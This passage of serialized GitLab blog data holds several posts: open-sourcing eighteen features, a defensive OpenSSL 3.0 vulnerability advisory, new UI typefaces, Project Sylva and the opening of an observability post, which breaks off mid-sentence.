Enjoy!\n\n\u003Ca href=\"https://app.netlify.com/start/deploy?repository=https://gitlab.com/netlify-templates/one-click-hugo-cms&stack=cms\" rel=\"nofollow noreferrer noopener\" target=\"_blank\">\u003Cimg src=\"https://www.netlify.com/img/deploy/button.svg\" alt=\"Deploy to Netlify\">\u003C/a>\n",[231,9],{"slug":4083,"featured":6,"template":689},"netlify-launches-gitlab-support","content:en-us:blog:netlify-launches-gitlab-support.yml","Netlify Launches Gitlab Support","en-us/blog/netlify-launches-gitlab-support.yml","en-us/blog/netlify-launches-gitlab-support",{"_path":4089,"_dir":244,"_draft":6,"_partial":6,"_locale":7,"seo":4090,"content":4096,"config":4101,"_id":4103,"_type":14,"title":4104,"_source":16,"_file":4105,"_stem":4106,"_extension":19},"/en-us/blog/new-features-to-core",{"title":4091,"description":4092,"ogTitle":4091,"ogDescription":4092,"noIndex":6,"ogImage":4093,"ogUrl":4094,"ogSiteName":673,"ogType":674,"canonicalUrls":4094,"schema":4095},"18 GitLab features are moving to open source","We're open sourcing rich functionality across Plan, Create, Verify, Package, Release, Configure, and Protect.","https://res.cloudinary.com/about-gitlab-com/image/upload/v1749667021/Blog/Hero%20Images/newnature_cropped.png","https://about.gitlab.com/blog/new-features-to-core","\n                        {\n        \"@context\": \"https://schema.org\",\n        \"@type\": \"Article\",\n        \"headline\": \"18 GitLab features are moving to open source\",\n        \"author\": [{\"@type\":\"Person\",\"name\":\"Sid Sijbrandij\"}],\n        \"datePublished\": \"2020-03-30\",\n      }",{"title":4091,"description":4092,"authors":4097,"heroImage":4093,"date":4098,"body":4099,"category":930,"tags":4100},[1235],"2020-03-30","I spent some time reviewing GitLab features and determined that, by our [Buyer-Based Open Core](/company/pricing/#the-likely-type-of-buyer-determines-what-features-go-in-what-tier) model, eighteen features that appear in seven different stages of the [DevOps lifecycle](/topics/devops/) ought to be open source.\n\nWhen we rolled out our Buyer-Based Open Core model in 2018, what we laid out is that features are assigned to each of our four individual tiers based on who the buyer of the feature is.\nFeatures that serve an individual contributor land in Core/Free.\nFeatures for managers land in Starter/Bronze, for directors in Premium/Silver, and executives in Ultimate/Gold.\nAs we explain the reasoning on [our pricing page](/company/pricing/#the-likely-type-of-buyer-determines-what-features-go-in-what-tier),\n> The feature is put in the plan based on what champion is most likely to **care** about it.\n> Buyers make sense, since a higher-cost plan needs a higher-placed buyer.\n\nThis pricing model has served us well, and we've been committed to it.\nBut, somewhere along the way, we failed to do an audit of many existing features.\nThat's what I did last month, and now I'm excited to share that after personally reviewing all features in each of our tiers **we are open sourcing an unprecedented number of GitLab features**.\n\nThis marks a major milestone in our efforts to empower the community to collaborate more robustly and to take our single tool for the DevOps lifecycle to the next level.\nFrom design management to package managers, managing multiple Kubernetes clusters to connecting related issues, we're making it easier than ever for an individual contributor to have everything they need to plan, build, deploy, and secure their application with GitLab.\n\n## It's not enough to talk the talk – we need to walk the walk.\n\nIf we're saying that [our features are based on the buyer](/company/pricing/#four-tiers), then we need to make sure that the right features are in the right place.\nWe've always been committed to our [stewardship](/company/stewardship/#how-open-source-benefits-from-open-core) of GitLab as an open source project.\nBy auditing the tier of features, we can better serve our open source community while more accurately aligning our business model.\nOur commitment to the open source community is why we will always work to [move features down our tiers](/company/pricing/#well-always-move-features-down)\nand [doing so quickly](/company/pricing/#if-a-feature-can-be-moved-down-do-it-quickly) and consistently.\n\n## We hope to unleash the power of everyone’s creativity\n\nOur mission has always been that [everyone can contribute](/company/mission/#mission).\nWith new functionality available to all users, it's easier than ever to contribute - contribute with GitLab, contribute to GitLab the application, or contribute to GitLab the company.\nSee something, submit a Merge Request (MR).\n\nWe recognize that many users in our community have creative ideas on how to make GitLab an even better product.\nBy partnering with the open-source community, we can open-source features even more quickly.\n\n## What's moving?\n\n![devops lifecycle](https://about.gitlab.com/images/blogimages/dev-ops-plan-to-monitor.png){: .medium.center}\n\nFeatures from Plan, Create, Verify, Package, Release, Configure, and Protect are moving.\nThis is *a lot* of features.\nWhile we've outlined all of these features that are ready to be moved to Core/Free, we need your help to move them.\n\nThe work to move the actual code to the open source part of the codebase is defined in issues that are linked from this blog post. These issues will go into the backlog for each of the respective product development teams and will be prioritized against new feature development.\nIf having this functionality in Core/Free is important to you, we invite you to contribute yourself to speed up the process.\nWe're not just giving you permission to help us move this code - we're asking you to help us move it.\n\n#### Synchronize collaboration with [Plan](/pricing/feature-comparison/)\n\n[Issues](https://docs.gitlab.com/ee/user/project/issues/) are the primary way people collaborate on ideas and plan work in GitLab.\nBy open sourcing these new features, we're making it easier than ever to plan your projects.\nWe can't wait to see what you come up with.\n* [Related issues](https://docs.gitlab.com/ee/user/project/issues/related_issues.html#related-issues): Connect related issues together.\n* [Export issues](https://docs.gitlab.com/ee/user/project/issues/csv_export.html): Export issues from GitLab as a CSV and receive the CSV as an attachment to your default notification email.\n* [Issue board focus mode](https://docs.gitlab.com/ee/user/project/issue_board.html#focus-mode): Use this tool to plan, organize, and visualize a workflow for a feature or product release. It can be used as a Kanban or a Scrum board.\n\n[Service desk](https://docs.gitlab.com/ee/user/project/service_desk.html) allows your team to connect directly with any external party through email right inside of GitLab –\nno external tools required.\nWith that, the complexity and inefficiencies of multiple tools are eliminated, significantly shortening the cycle time from feedback to software updates.\nWe would love to hear how you leverage service desk in your workflows now that it's open source.\n\n| Feature to move        | GitLab Issue |\n|------------------------|--------------|\n| Related issues         | [gitlab-org/gitlab#212329](https://gitlab.com/gitlab-org/gitlab/-/issues/212329) |\n| Export issues          | [gitlab-org/gitlab#212330](https://gitlab.com/gitlab-org/gitlab/-/issues/212330) |\n| Issue board focus mode | [gitlab-org/gitlab#212331](https://gitlab.com/gitlab-org/gitlab/-/issues/212331) |\n| Service desk           | [gitlab-org/gitlab#212332](https://gitlab.com/gitlab-org/gitlab/-/issues/212332) |\n\n#### Build better code and branch powerfully with [Create](/pricing/feature-comparison/)\n\nThe machine you're using shouldn't limit how easy it is to develop.\n\nWe're excited to bring down two features for developing in web-first environments.\n* The [Web Terminal for Web IDE](https://docs.gitlab.com/ee/user/project/web_ide/index.html#interactive-web-terminals-for-the-web-ide) makes it faster and easier to contribute changes to projects.\n* [File syncing to web terminal](https://docs.gitlab.com/ee/user/project/web_ide/#file-syncing-to-web-terminal) in the Web IDE helps you test code changes in a preconfigured terminal environment.\n\n[Design management](https://docs.gitlab.com/ee/user/project/issues/design_management.html#design-management) allows you to upload design assets (wireframes, mockups, etc.) to GitLab issues and keep them stored in one single place, accessed by the Design management’s page within an issue, ensuring issues are the single source of truth for everything required to develop a feature.\n\nAll together, these changes to create should make it easier to go from wireframe to MVC in the blink of an eye – independent of what machine you're on – improving project efficiency.\n\n| Feature to move        | GitLab Issue |\n|------------------------|--------------|\n| Web Terminal for Web IDE | [gitlab-org/gitlab#211685](https://gitlab.com/gitlab-org/gitlab/-/issues/211685) |\n| File syncing to the web terminal | [gitlab-org/gitlab#211686](https://gitlab.com/gitlab-org/gitlab/-/issues/211686) |\n| Design Management | [gitlab-org/gitlab#212566](https://gitlab.com/gitlab-org/gitlab/-/issues/212566) |\n\n#### Bring code quality to new heights with [Verify](/pricing/feature-comparison/)\n\n[Code quality](https://docs.gitlab.com/ee/ci/testing/code_quality.html) reports on MRs will be open source.\nKeeping your project’s code simple, readable, and easy to contribute to is difficult.\nCode quality on MRs makes this easier to do and maintain.\n\n| Feature to move        | GitLab Issue |\n|------------------------|--------------|\n| Code quality | [gitlab-org/gitlab#212499](https://gitlab.com/gitlab-org/gitlab/-/issues/212499) |\n\n#### Build and share packages in [Package](/pricing/feature-comparison/)\n\nWe're delivering a set of package managers so all your packages can stay in one place:\n* [Conan (C/C++) repository](https://docs.gitlab.com/ee/user/packages/conan_repository/)\n* [Maven (Java) repository](https://docs.gitlab.com/ee/user/packages/maven_repository/index.html)\n* [NPM (node) registry](https://docs.gitlab.com/ee/user/packages/npm_registry/index.html)\n* [NuGet (.NET) repository](https://docs.gitlab.com/ee/user/packages/nuget_repository/)\n\n| Feature to move        | GitLab Issue |\n|------------------------|--------------|\n| Package Managers | [gitlab-org&2867](https://gitlab.com/groups/gitlab-org/-/epics/2867) |\n\n#### Continuous delivery is simpler with [Release](/pricing/feature-comparison/)\n\nWith **four** incredible [Release](/pricing/feature-comparison/) features moving to Core/Free, you can be so confident in your releases that you deploy on Fridays (YMMV).\n\n* [Canary deployments](https://docs.gitlab.com/ee/user/project/canary_deployments.html) roll out the new version of your application to a small portion of your fleet.\n* [Incremental rollout](https://docs.gitlab.com/ee/topics/autodevops/index.html#incremental-rollout-to-production) allows you to first check how the new version of your application is behaving before increasing the rollout to 100%.\n* [Feature flags](https://docs.gitlab.com/ee/operations/feature_flags.html) allow you to ship a project in different flavors by dynamically toggling certain functionality.\n* [Deploy boards](https://docs.gitlab.com/ee/user/project/deploy_boards.html) offer a consolidated view of the current health and status of each CI environment running on Kubernetes. You can see the progress and status of a rollout, pod by pod, within your existing workflows without having to access Kubernetes.\n\n| Feature to move        | GitLab Issue |\n|------------------------|--------------|\n| Canary deployments     | [gitlab-org/gitlab#212319](https://gitlab.com/gitlab-org/gitlab/-/issues/212319) |\n| Incremental rollout    | [gitlab-org/gitlab#212316](https://gitlab.com/gitlab-org/gitlab/-/issues/212316) |\n| Feature flags          | [gitlab-org/gitlab#212318](https://gitlab.com/gitlab-org/gitlab/-/issues/212318) |\n| Deploy boards          | [gitlab-org/gitlab#212320](https://gitlab.com/gitlab-org/gitlab/-/issues/212320) |\n\n#### Support for multiple Kubernetes clusters in [Configure](/pricing/feature-comparison/)\n\nWith support for [multiple Kubernetes clusters](https://docs.gitlab.com/ee/user/project/clusters/#multiple-kubernetes-clusters), you will be able to easily deploy different environments, like Staging and Production, to different Kubernetes clusters.\nThis allows you to enforce strict data separation.\n\n| Feature to move        | GitLab Issue |\n|------------------------|--------------|\n| Support for multiple Kubernetes clusters | [gitlab-org/gitlab#212229](https://gitlab.com/gitlab-org/gitlab/-/issues/212229) |\n\n#### Bolster application security with [Protect](/pricing/feature-comparison/)\n\nProtect your apps and infrastructure from security intrusions.\n[Network policies for container network security](https://docs.gitlab.com/ee/update/removals.html) will be available to all users.\nWith that, you can install network policies into GitLab-managed Kubernetes clusters to limit communication between Kubernetes pods.\n\n| Feature to move        | GitLab Issue |\n|------------------------|--------------|\n| Network policies for container network security | [gitlab-org/gitlab#212571](https://gitlab.com/gitlab-org/gitlab/-/issues/212571) |\n\nWe hope that by open sourcing these features we will make it easier for all users to treat GitLab as a single application for the entire DevOps lifecycle. **We are thrilled about the limitless possibilities ahead of us as a community and we're looking forward to collaborating closely with each of you!**\n\nCover image by [Rodrigo Soares](https://unsplash.com/@rodi01?utm_medium=referral&amp;utm_campaign=photographer-credit&amp;utm_content=creditBadge) on [Unsplash](https://unsplash.com/photos/c6SciRp2kaQ?modal=%7B%22tag%22%3A%22CreditBadge%22%2C%22value%22%3A%7B%22userId%22%3A%22Tq225eP_V5M%22%7D%7D)",[685,9],{"slug":4102,"featured":6,"template":689},"new-features-to-core","content:en-us:blog:new-features-to-core.yml","New Features To Core","en-us/blog/new-features-to-core.yml","en-us/blog/new-features-to-core",{"_path":4108,"_dir":244,"_draft":6,"_partial":6,"_locale":7,"seo":4109,"content":4114,"config":4120,"_id":4122,"_type":14,"title":4123,"_source":16,"_file":4124,"_stem":4125,"_extension":19},"/en-us/blog/new-openssl-30-vulnerabilities-what-you-need-to-know-to-find-and-fix-them",{"title":4110,"description":4111,"ogTitle":4110,"ogDescription":4111,"noIndex":6,"ogImage":3063,"ogUrl":4112,"ogSiteName":673,"ogType":674,"canonicalUrls":4112,"schema":4113},"New OpenSSL 3.0 vulnerabilities: What you need to know to find and fix them","Learn how to identify your risk for CVE-2022-3786 and CVE-2022-3602.","https://about.gitlab.com/blog/new-openssl-30-vulnerabilities-what-you-need-to-know-to-find-and-fix-them","\n                        {\n        \"@context\": \"https://schema.org\",\n        \"@type\": \"Article\",\n        \"headline\": \"New OpenSSL 3.0 vulnerabilities: What you need to know to find and fix them\",\n        \"author\": [{\"@type\":\"Person\",\"name\":\"GitLab Security Team\"}],\n        \"datePublished\": \"2022-11-01\",\n      }",{"title":4110,"description":4111,"authors":4115,"heroImage":3063,"date":4117,"body":4118,"category":865,"tags":4119},[4116],"GitLab Security Team","2022-11-01","\n\nThe OpenSSL Project [announced two vulnerabilities](https://www.openssl.org/blog/blog/email-address-overflows/) found in OpenSSL 3.0-3.0.6 ([first released in September 2021](https://www.openssl.org/blog/blog/OpenSSL3.Final/)). CVE-2022-3786 and CVE-2022-3602 both relate to X.509 email address buffer overflows and require users to upgrade to OpenSSL 3.0.7, which includes patches for the vulnerabilities, which were downgraded from “critical” to “high.”\n\nOpenSSL is an open-source library used by applications to secure communications over the internet with the Secure Sockets Layer (SSL) and Transport Layer Security (TLS) protocols.\n\n## What are the OpenSSL 3.0 vulnerabilities?\n\nCVE-2022-3786 concerns an X.509 email address variable length buffer overflow that can result in a denial of service attack. CVE-2022-3602 concerns X.509 email address 4-byte buffer overflow that could result in a denial of service that could potentially escalate to remote code execution under specific circumstances (the circumstances were not detailed).\n\nCVE-2022-3602 was initially announced by the OpenSSL Project as a critical severity vulnerability, but was downgraded to high severity due to unlikely exploitation in “common conditions.”\n\n## How do the vulnerabilities work?\n\nAccording to the [OpenSSL bulletin](https://www.openssl.org/news/secadv/20221101.txt): “A buffer overrun can be triggered in X.509 certificate verification, specifically in name constraint checking. Note that this occurs\nafter certificate chain signature verification and requires either a\nCA to have signed the malicious certificate or for the application to\ncontinue certificate verification despite failure to construct a path\nto a trusted issuer. An attacker can craft a malicious email address\nto overflow four attacker-controlled bytes on the stack. This buffer\noverflow could result in a crash (causing a denial of service) or\npotentially remote code execution.\n\n\"Many platforms implement stack overflow protections which would mitigate\nagainst the risk of remote code execution. The risk may be further\nmitigated based on stack layout for any given platform/compiler...\n\n\"In a TLS client, this can be triggered by connecting to a malicious\nserver. In a TLS server, this can be triggered if the server requests\nclient authentication and a malicious client connects.”\n\n## Is your organization at risk?\n\nOnly applications that use OpenSSL 3.0 are at risk. To assess if your software supply chain is vulnerable, use GitLab’s [dependency scanning](https://docs.gitlab.com/ee/user/application_security/dependency_scanning/) and [container scanning](https://docs.gitlab.com/ee/user/application_security/container_scanning/).\n\nAccording to the [OpenSSL Security Team](https://www.openssl.org/blog/blog/email-address-overflows/): “The bugs were introduced as part of punycode decoding functionality (currently only used for processing email address name constraints in X.509 certificates). This code was first introduced in OpenSSL 3.0.0. OpenSSL 1.0.2, 1.1.1, and other earlier versions are not affected.”\n\n## Is GitLab vulnerable?\n\nWe have investigated and, as of now, we have found that none of our production systems were impacted by the vulnerability. \n\nHowever, our Dynamic Application Security Testing ([DAST](https://docs.gitlab.com/ee/user/application_security/dast/)) analyzer included the vulnerable library, which we have patched in [DAST v3.0.32](https://gitlab.com/gitlab-org/security-products/dast/-/releases/v3.0.32). Self-managed customers that are using our built-in DAST CI template after 15.0 can get the latest release from `registry.gitlab.com`. If using [the `always` pull policy](https://docs.gitlab.com/runner/executors/docker.html#using-the-always-pull-policy) the update will occur automatically. GitLab.com is already running the updated DAST scanner.\n\n## How to mitigate the vulnerability risk\n\nTo fix the flaws found in OpenSSL 3.0, organizations must upgrade to OpenSSL 3.0.7.\n\n",[865,9,930],{"slug":4121,"featured":6,"template":689},"new-openssl-30-vulnerabilities-what-you-need-to-know-to-find-and-fix-them","content:en-us:blog:new-openssl-30-vulnerabilities-what-you-need-to-know-to-find-and-fix-them.yml","New Openssl 30 Vulnerabilities What You Need To Know To Find And Fix Them","en-us/blog/new-openssl-30-vulnerabilities-what-you-need-to-know-to-find-and-fix-them.yml","en-us/blog/new-openssl-30-vulnerabilities-what-you-need-to-know-to-find-and-fix-them",{"_path":4127,"_dir":244,"_draft":6,"_partial":6,"_locale":7,"seo":4128,"content":4134,"config":4143,"_id":4145,"_type":14,"title":4146,"_source":16,"_file":4147,"_stem":4148,"_extension":19},"/en-us/blog/new-typefaces-in-gitlab",{"title":4129,"description":4130,"ogTitle":4129,"ogDescription":4130,"noIndex":6,"ogImage":4131,"ogUrl":4132,"ogSiteName":673,"ogType":674,"canonicalUrls":4132,"schema":4133},"Get to know the new GitLab typefaces","Dive deep into the considerations for changing to GitLab Sans (Inter) and JetBrains Mono, including improved readability.","https://res.cloudinary.com/about-gitlab-com/image/upload/v1749669926/Blog/Hero%20Images/Cover3.png","https://about.gitlab.com/blog/new-typefaces-in-gitlab","\n                        {\n        \"@context\": \"https://schema.org\",\n        \"@type\": \"Article\",\n        \"headline\": \"Get to know the new GitLab typefaces\",\n        \"author\": [{\"@type\":\"Person\",\"name\":\"Sascha Eggenberger\"},{\"@type\":\"Person\",\"name\":\"Jeremy Elder\"}],\n        \"datePublished\": \"2023-01-17\",\n      }",{"title":4129,"description":4130,"authors":4135,"heroImage":4131,"date":4138,"body":4139,"category":930,"tags":4140},[4136,4137],"Sascha Eggenberger","Jeremy Elder","2023-01-17","\nWe take the choice of typefaces very seriously around here. And, in the spirit of transparency, a [GitLab core value](https://handbook.gitlab.com/handbook/values/#transparency), we like to share our rationale for typeface changes. This blog introduces you to the new default typefaces in GitLab – GitLab Sans (Inter) and JetBrains Mono – and explores in detail why we chose them and how they will improve the user experience.\n\n## Introducing GitLab Sans and JetBrains Mono\n\nIn the recent [GitLab rebrand](/blog/devops-is-at-the-center-of-gitlab/), [Inter](https://rsms.me/inter/) was selected as the primary sans-serif typeface and we've adapted it for use in the GitLab user interface (UI) to have more continuity between the brand and product experience. It will be available for users in Release 15.8. Specifically for the UI, we've enabled disambiguation features (increased distinction between some characters) by default. Because of this change, we're including it under the name GitLab Sans in the open source package of GitLab. To complement GitLab Sans with a monospace typeface, we've chosen another open source option: [JetBrains Mono](https://www.jetbrains.com/lp/mono/).\n\nThe GitLab UI has historically relied on system fonts, like San Francisco on macOS and Segoe UI on Microsoft Windows. There are, however, limitations to using these that we'll cover in a moment.\n\n![GitLab Sans (Inter) and JetBrains Mono typefaces](https://about.gitlab.com/images/blogimages/introducing-new-typefaces/gitlab-sans-jetbrainsmono.png){: .center}\nGitLab Sans (Inter) and JetBrains Mono sample\n{: .note.text-center}\n\n## Why the change?\n\nSo we've already mentioned brand continuity as a driving reason for the change, but let's step back a bit. During the rebrand process, Inter was one of many typefaces considered because it was open source and designed for UI. Choosing a font primarily designed for digital output might seem like an odd choice for branding and print application, but the primary extension and experience is the product itself. GitLab is digital-first, and the brand reflects it. Inter had all of the qualities and features we knew we could leverage to enhance and realize our vision for the UI.\n\nWe realize there's a lot of subjectivity wrapped up in a change like this. Visual updates are, well, highly visible, but we believe they have to be rooted in objective considerations that lead to adding real value, so here are a few other aspects we evaluated and will cover in greater detail:\n\n- **Less is more** - How can we limit certain choices in ways that enable more meaningful ones?\n- **Consistency** - Can we create more harmony within a single view, streamline the experience across platforms, and reinforce the brand?\n- **Enhance the content** - Can content be more readable, discernable, and generally consumable?\n\n### Less is more\n\nTypography is a crucial part of the GitLab UI, if not _the_ most crucial part. As we continue to refine and beautify the experience, it's apparent that more control over the typography would yield a better experience not only for our users, but also the ones creating the experiences — our internal product, design, and development teams. System fonts have led to everything from false positive bug reports to visual regression errors on both sides. More choice — especially when systems are choosing — doesn't always lead to better experiences.\n\nWith multiple system fonts in play, we choose compromises, not enhancements. For example, asking what alignment works best for _most_ system fonts in a button instead of what alignment works best for _this_ font. Or, what weight should we use when not all system fonts have the same available options instead of what weight creates the right hierarchy for this content. With fewer typeface options we have more ability to make meaningful decisions about disambiguation, visual weight, language support, hierarchy, type scales, and so much more.\n\n### Consistency\n\nAn experience has multiple facets: a single view or screen, a flow between multiple views, a transition from reading to editing, or a switch from settings to documentation. Consistency should happen not only within each of these, but also across them. Consistency in a single view means hierarchy, balance, and harmony. In a flow, consistency establishes patterns and understanding. When contexts change, consistency brings familiarity and enhances trust. Typography is an important aspect of all of these.\n\nInconsistencies add up and lead to design, tech, and experience debt. There are known consistency problems with system fonts, for example, in Firefox on macOS, San Francisco has tighter letter spacing than on Chrome or Safari. This leads to different experiences across browsers, and this is just for one system font.\n\n![Comparing system fonts to show varied x-height](https://about.gitlab.com/images/blogimages/introducing-new-typefaces/compare-x-height.png){: .center}\nVaried x-heights of system fonts\n{: .note.text-center}\n\nOptically, system fonts are noticeably different in size. However, the difference is more visible when you compare the length of each due to character width, weight, and kerning (the space between characters). This impacts everything from truncation and component width, to wrapping and legibility.\n\n![Comparing system fonts to show varied width](https://about.gitlab.com/images/blogimages/introducing-new-typefaces/compare-width.png){: .center}\nVaried width of system fonts\n{: .note.text-center}\n\nMenlo has been used as our monospaced typeface. It appears bigger than many sans-serif typefaces when using the same font size. To counter that issue, we had downscaled its size by one pixel to make it appear as the same optical size. This added unnecessary bloat to styles and is also not foolproof since sans-serif system fonts also vary.\n\nInter and JetBrains Mono have nearly identical x-height, which allows us to remove all of the downscaling overrides and more generally handle text styles consistently. While both typefaces have specific use cases, they’re almost always present next to each other in the UI, making cohesiveness that much more important.\n\n![GitLab Sans (Inter) and JetBrains Mono x-height comparison](https://about.gitlab.com/images/blogimages/introducing-new-typefaces/gitlab-sans-jetbrainsmono-x-height.png){: .center}\nGitLab Sans and JetBrains Mono with similar x-height\n{: .note.text-center}\n\nBy reducing our typeface options, we're working towards consistency in so many ways we haven't before, everything from brand to product, product to documentation, and browser to browser. Consistency is not the same as uniformity though, and nor should it inhibit preference, but by creating a baseline those things can have room for more thoughtful approaches in the future too.\n\n### Enhance the content\n\nAs mentioned earlier, typography is a crucial part of the UI, and arguably most of the content is in text form. Whether communication or code, status or state, the typeface is the delivery vehicle for the content. GitLab Sans and JetBrains Mono give us better control over readability.\n\nBoth typefaces include variable webfont and contextual features, which means that the font weight and other settings can be finely tuned to enhance visual weight, hierarchy, and contextual alternates. For GitLab Sans, we've enabled the disambiguation feature set to ensure readability is a top priority. Disambiguation is used to avoid common character confusion. For example, by using the feature set [cv05](https://rsms.me/inter/lab/?feat-cv05=1) (lowercase L with tail for disambiguation), you can easily distinguish between the capital “I” and the lowercase “L” (see image below). We had discussed using either [ss04](https://rsms.me/inter/lab/?feat-ss04=1) (disambiguation without slash zero) or cv05 and decided to go with the latter for a simple, modern look.\n\n![Inter Typface character disambiguation](https://about.gitlab.com/images/blogimages/introducing-new-typefaces/inter-disambiguation.png){: .center}\nInter disambiguation options from left to right: Default, without slashed zero (ss04), lowercase L with tail (cv05)\n{: .note.text-center}\n\nGitLab uses a condensed UI, meaning more content in less space and typically at smaller sizes. Inter is popular for a reason, more likely dozens, but the most applicable to GitLab is that it’s designed specifically for UI. On the [website](https://rsms.me/inter/) it states, “Inter is a typeface carefully crafted & designed for computer screens.” With a tall x-height, contextual alternates, tabular numbers, and more, Inter enables us to actually make more meaningful typography decisions that impact readability.\n\nSimilarly, JetBrains Mono has a tall x-height, which increases readability at smaller sizes, and it has a normal character width to keep more characters on a single line which limits wrapping. During our exploration, we found that typefaces like Menlo, Fira Code, Source Code, or Noto Sans Mono either have shorter x-heights or wider characters that lead to size or spacing compromises.\n\nWith these typefaces in place we've started a deep dive into our type scales and updating design resources in Figma too. The upcoming work on type scales, in particular, will provide more consistency and refinement.\n\n## Other considerations\n\nGitLab is an [open core](/blog/gitlab-is-open-core-github-is-closed-source/) product, which means the core of our product is open source, so selecting typefaces that are also open source was a crucial part of the decision. \n\nAnytime you opt to distribute your own resources versus using what's already available to the system the question of performance comes up. And while it's true that we're increasing the payload by a few kilobytes, we're able to rely on modern CSS and browser handling for delivery and caching. At the same time, we're reducing the CSS by removing styles that have been added to counter aforementioned compromises. This is something we'll continue to evaluate and optimize.\n\nAnd speaking of distribution, we're [packaging the fonts](https://www.npmjs.com/package/@gitlab/fonts) to make it easier for all of our properties to consume. This means we're also able to leverage the same resources in our design tooling.\n\nLastly, we know that changes like this have the benefit (or downside, depending on how you look at it) of exposing other inconsistencies in the UI that need to be addressed. While it seems counterintuitive to release an update that potentially introduces visual regression, we consider it as the dye in the water to let us know what else we have to fix as we continue to work towards a single source of truth for typography styles.\n\n## What's next?\n\nAs the typography changes are being rolled out, we’re working through feedback and addressing any potential regressions. Along with type scale updates, we're going to evaluate headings throughout the product to ensure heading levels align with correct Document Object Model (DOM) structure, visual weight, and styles. In short, our typography decisions are interdependent and foundational for the overall experience. By limiting typeface options, we’re removing the limits of how hard we can make typography work so that we can further refine the interface, bring harmony to the UI, and make content more consumable so that using GitLab is more productive and enjoyable. \n\nIf you’d like to provide feedback or contribute, please use this [feedback issue](https://gitlab.com/gitlab-org/gitlab/-/issues/386205).\n",[4141,1376,9,1495,4142,730],"design","UI",{"slug":4144,"featured":6,"template":689},"new-typefaces-in-gitlab","content:en-us:blog:new-typefaces-in-gitlab.yml","New Typefaces In Gitlab","en-us/blog/new-typefaces-in-gitlab.yml","en-us/blog/new-typefaces-in-gitlab",{"_path":4150,"_dir":244,"_draft":6,"_partial":6,"_locale":7,"seo":4151,"content":4157,"config":4162,"_id":4164,"_type":14,"title":4165,"_source":16,"_file":4166,"_stem":4167,"_extension":19},"/en-us/blog/next-gen-telecom-with-gitlab",{"title":4152,"description":4153,"ogTitle":4152,"ogDescription":4153,"noIndex":6,"ogImage":4154,"ogUrl":4155,"ogSiteName":673,"ogType":674,"canonicalUrls":4155,"schema":4156},"Developing next-generation telecommunications with GitLab","Learn more about Project Sylva, a cross-industry collaboration to build a cloud-native, open source telecommunications platform using GitLab.","https://res.cloudinary.com/about-gitlab-com/image/upload/v1749682864/Blog/Hero%20Images/telecomabstract.jpg","https://about.gitlab.com/blog/next-gen-telecom-with-gitlab","\n                        {\n        \"@context\": \"https://schema.org\",\n        \"@type\": \"Article\",\n        \"headline\": \"Developing next-generation telecommunications with GitLab\",\n        \"author\": [{\"@type\":\"Person\",\"name\":\"Bryan Behrenshausen\"}],\n        \"datePublished\": \"2023-08-07\",\n      }",{"title":4152,"description":4153,"authors":4158,"heroImage":4154,"date":4159,"body":4160,"category":10,"tags":4161},[2909],"2023-08-07","\nIn November 2022, the Linux Foundation Europe [announced the launch of Project Sylva](https://www.linuxfoundation.org/press/linux-foundation-europe-announces-project-sylva-to-create-open-source-telco-cloud-software-framework-to-complement-open-networking-momentum), a cloud-native, [open source](https://go.gitlab.com/spHNym) telecommunications software stack. The initiative represents a cross-industry collaboration between major telecommunications providers and vendors (Telefonica, Telecom Italia, Orange, Vodafone, Deutsche Telekom, Ericsson, and Nokia), who formally agreed to collaborate on building the foundation of a next-generation telecommunications system in the open.\n\nToday that work continues [on GitLab](https://gitlab.com/sylva-projects), where the project is gaining momentum as its contributor community grows. Eager to hear what that community has achieved since last year, I sat down with [André Vieira](https://gitlab.com/andre.macedo.av), the project's communications lead. \n\nWatch our interview to learn more about Sylva's guiding mission and vision, its successes, its challenges, and its future.\n\n## Watch the interview\n\n\u003C!-- blank line -->\n\u003Cfigure class=\"video_container\">\n  \u003Ciframe src=\"https://www.youtube.com/embed/mblgJpmvkZI\" frameborder=\"0\" allowfullscreen=\"true\"> \u003C/iframe>\n\u003C/figure>\n\u003C!-- blank line -->\n",[9,267,1099],{"slug":4163,"featured":6,"template":689},"next-gen-telecom-with-gitlab","content:en-us:blog:next-gen-telecom-with-gitlab.yml","Next Gen Telecom With Gitlab","en-us/blog/next-gen-telecom-with-gitlab.yml","en-us/blog/next-gen-telecom-with-gitlab",{"_path":4169,"_dir":244,"_draft":6,"_partial":6,"_locale":7,"seo":4170,"content":4175,"config":4181,"_id":4183,"_type":14,"title":4184,"_source":16,"_file":4185,"_stem":4186,"_extension":19},"/en-us/blog/observability-is-key-to-cloud-native-transitions-and-modern-application-development",{"title":4171,"description":4172,"ogTitle":4171,"ogDescription":4172,"noIndex":6,"ogImage":671,"ogUrl":4173,"ogSiteName":673,"ogType":674,"canonicalUrls":4173,"schema":4174},"Observability's role in cloud-native app development","Want better visibility into the entire software development lifecycle across environments? Learn how observability can help.","https://about.gitlab.com/blog/observability-is-key-to-cloud-native-transitions-and-modern-application-development","\n                        {\n        \"@context\": \"https://schema.org\",\n        \"@type\": \"Article\",\n        \"headline\": \"Observability is key to cloud-native transitions and modern application development\",\n        \"author\": [{\"@type\":\"Person\",\"name\":\"Sandra Gittlen\"}],\n        \"datePublished\": \"2022-04-05\",\n      }",{"title":4176,"description":4172,"authors":4177,"heroImage":671,"date":4178,"body":4179,"category":682,"tags":4180},"Observability is key to cloud-native transitions and modern application development",[862],"2022-04-05","\n\n_This blog post and linked pages contain information related to upcoming products, features, and functionality. It is important to note that the information presented is for informational purposes only. Please do not rely on this information for purchasing or planning purposes._\n\nModern application development requires DevOps teams to be able to collaborate and react to what is happening across the software development lifecycle. Yet, as companies move away from monolithic code bases resident on a server or cluster of virtual machines to cloud-native environments, this goal becomes more difficult to achieve. Cloud-native architectures are more complex with more elements to configure, protect, execute, and measure. To ensure maximum visibility and responsiveness to issues early on in application development and throughout the lifecycle, companies are adopting observability.\n\n## Observability defined\n\nObservability, which [451 Research](https://451research.com/) defines as the collection and analysis of data logs, metrics, and traces, becomes critical and essential with cloud-native technologies and acts as a step beyond monitoring. “The need for such an approach has been brought to the fore by complex, distributed microservices-based applications where the variables are so numerous that it can be impossible to know exactly what metrics need to be collected for the gamut of potential events that could arise,” 451 Research’s “Voice of the Enterprise: DevOps, Organizational Dynamics - Advisory Report” states.\n\n“A need to know what is happening with infrastructure and applications, particularly across hybrid and multi-cloud infrastructure, has driven broad adoption of observability,” according to the report.\n\n## How observability improves cloud-native tech adoption\n\nMore than half of organizations surveyed by 451 Research report either full adoption or some adoption at the team level of cloud-native technologies such as containers, Kubernetes, service mesh, and serverless computing. Another quarter to one-third of respondents plans to deploy cloud-native technologies.\n\nThe challenge is visibility across this new, more complex architecture. While cloud-native technologies offer more flexibility and cost 